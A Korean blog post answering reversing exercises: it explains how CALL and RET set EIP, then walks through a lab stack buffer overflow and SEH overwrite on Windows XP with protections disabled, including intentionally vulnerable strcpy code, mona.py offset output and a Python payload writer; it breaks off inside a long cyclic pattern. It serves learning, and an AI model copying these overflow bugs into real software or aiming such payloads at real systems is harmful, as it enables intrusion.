p. 18

p. 18

2018. 1. 21. 20:32ㆍ0x03 Reversing Theory/역공학 연습문제

728x90

1번. CALL과 RET에 대해 배운 것을 토대로 EIP 값을 읽는 방법에 대해 설명해보자.

왜 단순하게 MOV EAX, EIP라고 하지 않는가도 생각해보자.

리버싱을 하다보면, CALL 명령어 뒤에 레지스터 내 주소 값이나, 특정 주소가 적혀있는 경우를 많이 볼 수 있다.

EX) CALL EAX or CALL 40xxxxxx

만약, EAX에 401005가 있다면 Step in을 했을 때 401005주소로 JUMP하게 된다.

이때 401005주소로 점프하면서 EIP값도 401005가 되게 된다.

그렇다면, EIP는 주소 값이 폴짝 폴짝 뛸 때 따라가는 친구라고도 표현할 수 있겠다.

CALL 이라는 명령어는 함수를 호출 할 때 쓰이는 명령어이다.

CALL 하는 순간 이전 함수의 위치를 저장해두고 새로운 함수로 이동해야한다. EIP는 PC의 개념도 가지고 있기 때문에 CALL EAX 입장에서는

다음에 수행해야할 명령어의 주소(EIP)가 401005가 되어야 한다.

RET는 현재 함수에서 사용한 스택을 정리하고, 이 함수를 호출한 함수에게 되돌아가야한다.

예를 들어 설명을 해보자.

void test()

{

printf("TEST\n");

return;

}

int main()

{

test();

printf("hello\n");

}

아주 간단한 c코드가 있다.

int main()

{

int n,m=0;

printf("Hi\n"); // 여기 주소를 40100A라고 가정

test(); <- 여기 주소를 401020라고 가정

printf("hello\n"); // 여기 주소를 401010라고 가정

}

printf("Hi\n") 해당 코드일 때 eip는 40100A이다.

test(); 를 어셈으로 나타내면 call test가 된다.

call은 위에서 언급했듯이 함수를 호출함과 동시에 이전 함수의 주소를 백업해둔다.

그래서 새로운 함수에 접근 시 push ebp / mov ebp,esp가 되는 것이다. (esp는 아까전에 가지고 있던 주소-4가 된다)

test에 접근하게 되면 eip는 401020이 되어서 test함수에서 요구하는 기능들을 수행하고 retn을 만나게 될 것이다.

retn을 만나기 전에 push했던 값들을 다시 pop하여 레지스터로 복구 시키면서 이전 함수에서 수행했던 기억을 되살리게 된다.

기억을 전부 되살렸다면, test함수를 빠져나오면서 eip는 다음에 수행할 명령어의 주소니까 401010을 가리키게 되는 것이다.

그렇다면, 단순하게 mov eax, eip로 하면 안되나?

정답은, 안된다이다. 도대체 왜 ? mov eax, edx or mov eax,ecx 이런건 잘 되면서 !

eip값은 인라인어셈으로 mov eax, eip로 작성할 시 에러를 표출하게 된다.

그래서 보통 eip를 변조 하고 싶을 때는 pop pop ret나 jmp esp를 이용하게 된다.

아직 완벽하게 이해는 안되었지만, 동적으로 테스트를 진행했을 때도 EIP만큼은 디버거에서 조작이 불가능 하였다.

에러 : 심각도 코드 설명 프로젝트 파일 줄 비표시 오류(Suppression) 상태

오류 C2094 'eip' 레이블이 정의되지 않았습니다.

eip 레이블이 정의되지 않았다고 뜨게 된다.

보안적 관점으로 접근하게 되면, eip를 자신 맘대로 조작을 하게 되면 무조건 익스플로잇 코드는 실행이 되게 될 것이다. 이러면 모든 프로그램은 100% 안전하지 못하게 되기도 한다.

컨펌 후 추가 사항

1. gdb에서는 eip 강제조작이 가능하다고 한다.

2. x86_64에서는 mov rax, rip 대신 lea rax, [rip] 가 가능하여 직접 접근이 가능하다고 한다.

이 때 다음 인스트럭션 주소가 rax에 저장된다고 한다. -> 컨펌 : CPU 파이프라인에 대해 공부해봐라고 하셨다.

CPU파이프라인을 공부 목록에 추가 하여 이해를 하는 시간을 조만간 가질 계획이다.

덤으로 알려주신 것 중 CPU 파이프라인을 이해하게 되면 멜트다운 과 스펠터에 대해 좀 더 자세히 이해 할 수 있다고 하셨다.

CPU는 명령 해석(Fetch Cycle), 메모리 접근, 연산(ALU), 레지스터 관리 등을 담당하는 회로가 각각 따로 존재하고 있다.

그 이유는 이러한 상황을 생각해보면 된다.

만약에 명령이 순차적으로 실행되게 되면 CPU는 clock pulse에 동기되어 돌아가는 구조를 취하게 되는데 이렇게 되면 한 번에 하나의 동작 만을 수행하게 된다. 그렇다면 다른 회로는 휴식 상태에 접어든다는 것이 되는데 휴식 상태에 접어든다는 것은 active상태가 아닌 unactive 상태이다. 아주 단순한 하나의 프로세스에서 멀티 스레드를 설계해도 여러개의 기능이 동시에 동작하는데 모든 것을 관리하는 대장인 CPU 자체가 무조건 한번에 하나의 동작을 취하게 되면 다른 중요한 일이 생겼을 때 (example. 연산을 하는 도중에는 메모리에 접근이 불가능하다 즉, non execution 상황이라고 가정할 수 있을 것 같다)

이러한 상황이 생기는 것을 방지하기 위해 CPU 설계자 분들은 Out-of-Order Execution(OoE) 라는 방법을 생각해 냈다고 한다. 해당 기능을 한국말로 표현하면 비순차적 명령어 처리이다. 멜트다운이 OoE 매커니즘 결함을 악용한 공격이기도 하다.

OoE는 CPU의 각 파트 (example. 명령어 해석, 레지스터 관리, 산술 및 논리연산(ALU), 메모리 접근)들을 병렬로 항상 동작하는 상태로 놓게 만들어 클럭의 최대 성능을 활용할 수 있게 하였었다.

정말 영리한 방법이었지만, 이 기능의 결함을 악용하는 사례가 터져서 개인적으로 무섭기도 하였다. 아무리 좋은 것을 개발한다고 하여도 누군가는 그 기능을 악용할 수 있는 현실이.

2번. EIP를 0xAABBCCDD로 설정하는 방법을 적어도 두 가지 제시해보자.

일반적으로 보게 되면 Direct EIP Overwrite 기법을 사용할 수 있다.

해당 기법은 BOF에서 볼 수 있다. 기존에 명시한 값의 크기 보다 비정상적으로 큰 버퍼를 삽입하여 SFP와 RET를 덮는 행위를 BOF라고 하는데 RET를 거치게 되면 1번에서 설명했듯이 EIP가 변하게 된다. 해당 함수를 빠져나오고 그 함수를 호출한 공간에서 다음 주소를 찾아가야 하기 때문이다.

예를 들어서 설명해보자.

#include<stdio.h>

#include <string.h>

int main(int argc, char*argv[])

{

char buf[10];

if (argc != 2)

return -1;

strcpy(buf, argv[1]);

return 0;

}

이 코드에서 취약점이 무엇인지 보여야 한다.

argv[1]이라는 것은 매개변수를 뜻하게 된다.

argv[1]은 동적인 source가 되고, buf는 정적으로 사이즈가 10바이트인 버퍼가 된다.

strcpy라는 함수에서 동적Source의 사이즈의 한계를 지정해주지 않기 때문에 argv[1]에는 10bytes 이상의 값이 들어가도 된다.

간단한 예시이기 때문에 ASLR,GS(Guard Stack)aka.canary, SEH Handler 등을 해제 하고 컴파일 해보겠다.

Test Environment

OS : WIN XP SP3 ENG

IDE : VS 2008

OPTION : NO ASLR, NO GS, NO SEH

[ASLR 해제 + GS 해제]

메인에 접근하여 얼른 strcpy에 가보자.

[ARGUMENT] : A 18bytes

argc의 값이 2가 맞는지 체크 한다. 2가 맞기 때문에 정상루틴을 진행할 수 있다.

해당 그림을 보면 리턴 되는 주소가 있고, 내가 입력한 A 값이 스택에 차곡 차곡 쌓이고 있는 모습을 볼 수 있다.

정상 적인 버퍼 였다면 4011AE를 덮지 않으면서 주소 401053까지 가게 되면 4011AE에 무사히 도착하게 될 것이다.

그런데.. 지금 큰일이 나버렸다 !!

RET 위치가 덮여버렸다. RET 전부를 덮는 값을 넣지 않아서 두바이트는 덮지 못했다.

하지만, 상관없다. 0X4141이라는 주소는 없기 때문이다. 연속으로 두장의 사진을 보자.

리턴 값 주소를 덮은 사진과 EIP가 변조되는 사진을 볼 거다.

이제 문제에서 요구하는 0xAABBCCDD로 변경 해볼 것이다.

지금 예제로 굳이 바꿔보겠다면, JMP 0xAABBCCDD로 그냥 해버리면 되긴 한다. 너무 억지스러우니 파일을 이용하여 변조하는 것을 시도해보자.

취약 코드

OPTION : SEH ON 상황 부여

#include <windows.h>

#include <string.h>

#include <stdio.h>

int main(int argc, char*argv[])

{

char buf[100];

char vuln_buf[10];

FILE *f;

if(argc !=2){

printf("Usage: filename\n");

exit(-1);

}

f = fopen(argv[1],"r");

fgets(buf,100,f);

strcpy(vuln_buf,buf);

printf("%s\n",buf);

}

정석으로 진행 + 공부를 위해 우선 페이로드를 작성하여 몇 offset에서 eip가 변조 되는지 알아보자.

Immunity Debugger의 mona.py를 통해 패턴을 20바이트 생성하였다.

!mona pattern_create 20 ( 사실상 여기서 바로 게임은 끝날 수 있었는데 잔 실수를 ㅎㅎㅎㅎ)

#!python

import struct

pattern = "Aa0Aa1Aa2Aa3Aa4Aa5Aa"

change_esp = struct.pack('<L',0xAABBCCDD) #4byte

payload = pattern

#payload = "A"*4 + change_eip + "A"*4

f = open('exploit.txt','wb')

f.write(payload)

f.close()

생각을 다시 해보니, seh handler를 덮으려면 20바이트로는 전혀 안된다. 통 크게 1000바이트 간다.

본의 아니게 삽질했다. 왜 그런지 모르겠는데.. exe를 그냥 실행하면 잘 되고 디버깅 하면 SEH Handler를 덮는다?

교훈 : breakpoint를 잘 걸자 ~ !

패턴을 발견하였다.

Log data, item 9

Address=0BADF00D

Message= - Pattern 6Aa7 (0x37614136) found in cyclic pattern at position 20 <- 이건 버퍼의 RET가 덮인 것

Log data, item 9

Address=0BADF00D

Message= - Pattern Ac4A (0x41346341) found in cyclic pattern at position 72 <- 이건 SEH가 덮인 것

72바이트에서 변조가 되었으니 SEH_NEXT + SEH_HANDLER가 SEH 구조체니까 68를 하자.

우리는 EIP를 0xAABBCCDD로 만들어야 한다.

SEH_HANDLER의 주소에 0xAABBCCDD를 넣으면 될 것 같다.

시행 착오 페이로드

#!python

import struct

pattern = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk6Gk7Gk8Gk9Gl0Gl1Gl2Gl3Gl4Gl5Gl6Gl7Gl8Gl9Gm0Gm1Gm2Gm3Gm4Gm5Gm6Gm7Gm8Gm9Gn0Gn1Gn2Gn3Gn4Gn5Gn6Gn7Gn8Gn9Go0Go1Go2Go3Go4Go5Go6Go7Go8Go9Gp0Gp1Gp2Gp3Gp4Gp5Gp6Gp7Gp8Gp9Gq0Gq1Gq2Gq3Gq4Gq5Gq6Gq7Gq8Gq9Gr0Gr1Gr2Gr3Gr4Gr5Gr6Gr7Gr8Gr9Gs0Gs1Gs2Gs3Gs4Gs5Gs6Gs7Gs8Gs9Gt0Gt1Gt2Gt3Gt4Gt5Gt6Gt7Gt8Gt9Gu0Gu1Gu2Gu3Gu4Gu5Gu6Gu7Gu8Gu9Gv0Gv1Gv2Gv3Gv4Gv5Gv6Gv7Gv8Gv9Gw0Gw1Gw2Gw3Gw4Gw5Gw6Gw7Gw8Gw9Gx0Gx1Gx2Gx3Gx4Gx5Gx6Gx7Gx8Gx9Gy0Gy1Gy2Gy3Gy4Gy5Gy6Gy7Gy8Gy9Gz0Gz1Gz2Gz3Gz4Gz5Gz6Gz7Gz8Gz9Ha0Ha1Ha2Ha3Ha4Ha5Ha6Ha7Ha8Ha9Hb0Hb1Hb2Hb3Hb4Hb5Hb6Hb7Hb8Hb9Hc0Hc1Hc2Hc3Hc4Hc5Hc6Hc7Hc8Hc9Hd0Hd1Hd2Hd3Hd4Hd5Hd6Hd7Hd8Hd9He0He1He2He3He4He5He6He7He8He9Hf0Hf1Hf2Hf3Hf4Hf5Hf6Hf7Hf8Hf9Hg0Hg1Hg2Hg3Hg4Hg5Hg6Hg7Hg8Hg9Hh0Hh1Hh2Hh3Hh4Hh5Hh6Hh7Hh8Hh9Hi0Hi1Hi2Hi3Hi4Hi5Hi6Hi7Hi8Hi9Hj0Hj1Hj2Hj3Hj4Hj5Hj6Hj7Hj8Hj9Hk0Hk1Hk2Hk3Hk4Hk5Hk6Hk7Hk8Hk9Hl0Hl1Hl2Hl3Hl4Hl5Hl6Hl7Hl8Hl9Hm0Hm1Hm2Hm3Hm4Hm5Hm6Hm7Hm8Hm9Hn0Hn1Hn2Hn3Hn4Hn5Hn6Hn7Hn8Hn9Ho0Ho1Ho2Ho3Ho4Ho5Ho6Ho7Ho8Ho9Hp0Hp1Hp2Hp3Hp4Hp5Hp6Hp7Hp8Hp9Hq0Hq1Hq2Hq3Hq4Hq5Hq6Hq7Hq8Hq9Hr0Hr1Hr2Hr3Hr4Hr5Hr6Hr7Hr8Hr9Hs0Hs1Hs2Hs3Hs4Hs5Hs6Hs7Hs8Hs9Ht0Ht1Ht2Ht3Ht4Ht5Ht6Ht7Ht8Ht9Hu0Hu1Hu2Hu3Hu4Hu5Hu6Hu7Hu8Hu9Hv0Hv1Hv2Hv3Hv4Hv5Hv6Hv7Hv8Hv9Hw0Hw1Hw2Hw3Hw4Hw5Hw6Hw7Hw8Hw9Hx0Hx1Hx2Hx3Hx4Hx5Hx6Hx7Hx8Hx9Hy0Hy1Hy2Hy3Hy4Hy5Hy6Hy7Hy8Hy9Hz0Hz1Hz2Hz3Hz4Hz5Hz6Hz7Hz8Hz9Ia0Ia1Ia2Ia3Ia4Ia5Ia6Ia7Ia8Ia9Ib0Ib1Ib2Ib3Ib4Ib5Ib6Ib7Ib8Ib9Ic0Ic1Ic2Ic3Ic4Ic5Ic6Ic7Ic8Ic9Id0Id1Id2Id3Id4Id5Id6Id7Id8Id9Ie0Ie1Ie2Ie3Ie4Ie5Ie6Ie7Ie8Ie9If0If1If2If3If4If5If6If7If8If9Ig0Ig1Ig2Ig3Ig4Ig5Ig6Ig7Ig8Ig9Ih0Ih1Ih2Ih3Ih4Ih5Ih6Ih7Ih8Ih9Ii0Ii1Ii2Ii3Ii4Ii5Ii6Ii7Ii8Ii9Ij0Ij1Ij2Ij3Ij4Ij5Ij6Ij7Ij8Ij9Ik0Ik1Ik2Ik3Ik4Ik5Ik6Ik7Ik8Ik9Il0Il1Il2Il3Il4Il5Il6Il7Il8Il9Im0Im1Im2Im3Im4Im5Im6Im7Im8Im9In0In1In2In3In4In5In6In7In8In9Io0Io1Io2Io3Io4Io5Io6Io7Io8Io9Ip0Ip1Ip2Ip3Ip4Ip5Ip6Ip7Ip8Ip9Iq0Iq1Iq2Iq3Iq4Iq5Iq6Iq7Iq8Iq9Ir0Ir1Ir2Ir3Ir4Ir5Ir6Ir7Ir8Ir9Is0Is1Is2Is3Is4Is5Is6Is7Is8Is9It0It1It2It3It4It5It6It7It8It9Iu0Iu1Iu2Iu3Iu4Iu5Iu6Iu7Iu8Iu9Iv0Iv1Iv2Iv3Iv4Iv5Iv6Iv7Iv8Iv9Iw0Iw1Iw2Iw3Iw4Iw5Iw6Iw7Iw8Iw9Ix0Ix1Ix2Ix3Ix4Ix5Ix6Ix7Ix8Ix9Iy0Iy1Iy2Iy3Iy4Iy5Iy6Iy7Iy8Iy9Iz0Iz1Iz2Iz3Iz4Iz5Iz6Iz7Iz8Iz9Ja0Ja1Ja2Ja3Ja4Ja5Ja6Ja7Ja8Ja9Jb0Jb1Jb2Jb3Jb4Jb5Jb6Jb7Jb8Jb9Jc0Jc1Jc2Jc3Jc4Jc5Jc6Jc7Jc8Jc9Jd0Jd1Jd2Jd3Jd4Jd5Jd6Jd7Jd8Jd9Je0Je1Je2Je3Je4Je5Je6Je7Je8Je9Jf0Jf1Jf2Jf3Jf4Jf5Jf6Jf7Jf8Jf9Jg0Jg1Jg2Jg3Jg4Jg5Jg6Jg7Jg8Jg9Jh0Jh1Jh2Jh3Jh4Jh5Jh6Jh7Jh8Jh9Ji0Ji1Ji2Ji3Ji4Ji5Ji6Ji7Ji8Ji9Jj0Jj1Jj2Jj3Jj4Jj5Jj6Jj7Jj8Jj9Jk0Jk1Jk2Jk3Jk4Jk5Jk6Jk7Jk8Jk9Jl0Jl1Jl2Jl3Jl4Jl5Jl6Jl7Jl8Jl9Jm0Jm1Jm2Jm3Jm4Jm5Jm6Jm7Jm8Jm9Jn0Jn1Jn2Jn3Jn4Jn5Jn6Jn7Jn8Jn9Jo0Jo1Jo2Jo3Jo4Jo5Jo6Jo7Jo8Jo9Jp0Jp1Jp2Jp3Jp4Jp5Jp6Jp7Jp8Jp9Jq0Jq1Jq2Jq3Jq4Jq5Jq6Jq7Jq8Jq9Jr0Jr1Jr2Jr3Jr4Jr5Jr6Jr7Jr8Jr9Js0Js1Js2Js3Js4Js5Js6Js7Js8Js9Jt0Jt1Jt2Jt3Jt4Jt5Jt6Jt7Jt8Jt9Ju0Ju1Ju2Ju3Ju4Ju5Ju6Ju7Ju8Ju9Jv0Jv1Jv2Jv3Jv4Jv5Jv6Jv7Jv8Jv9Jw0Jw1Jw2Jw3Jw4Jw5Jw6Jw7Jw8Jw9Jx0Jx1Jx2Jx3Jx4Jx5Jx6Jx7Jx8Jx9Jy0Jy1Jy2Jy3Jy4Jy5Jy6Jy7Jy8Jy9Jz0Jz1Jz2Jz3Jz4Jz5Jz6Jz7Jz8Jz9Ka0Ka1Ka2Ka3Ka4Ka5Ka6Ka7Ka8Ka9Kb0Kb1Kb2Kb3Kb4Kb5Kb6Kb7Kb8Kb9Kc0Kc1Kc2Kc3Kc4Kc5Kc6Kc7Kc8Kc9Kd0Kd1Kd2Kd3Kd4Kd5Kd6Kd7Kd8Kd9Ke0Ke1Ke2Ke3Ke4Ke5Ke6Ke7Ke8Ke9Kf0Kf1Kf2Kf3Kf4Kf5Kf6Kf7Kf8Kf9Kg0Kg1Kg2Kg3Kg4Kg5Kg6Kg7Kg8Kg9Kh0Kh1Kh2Kh3Kh4Kh5Kh6Kh7Kh8Kh9Ki0Ki1Ki2Ki3Ki4Ki5Ki6Ki7Ki8Ki9Kj0Kj1Kj2Kj3Kj4Kj5Kj6Kj7Kj8Kj9Kk0Kk1Kk2Kk3Kk4Kk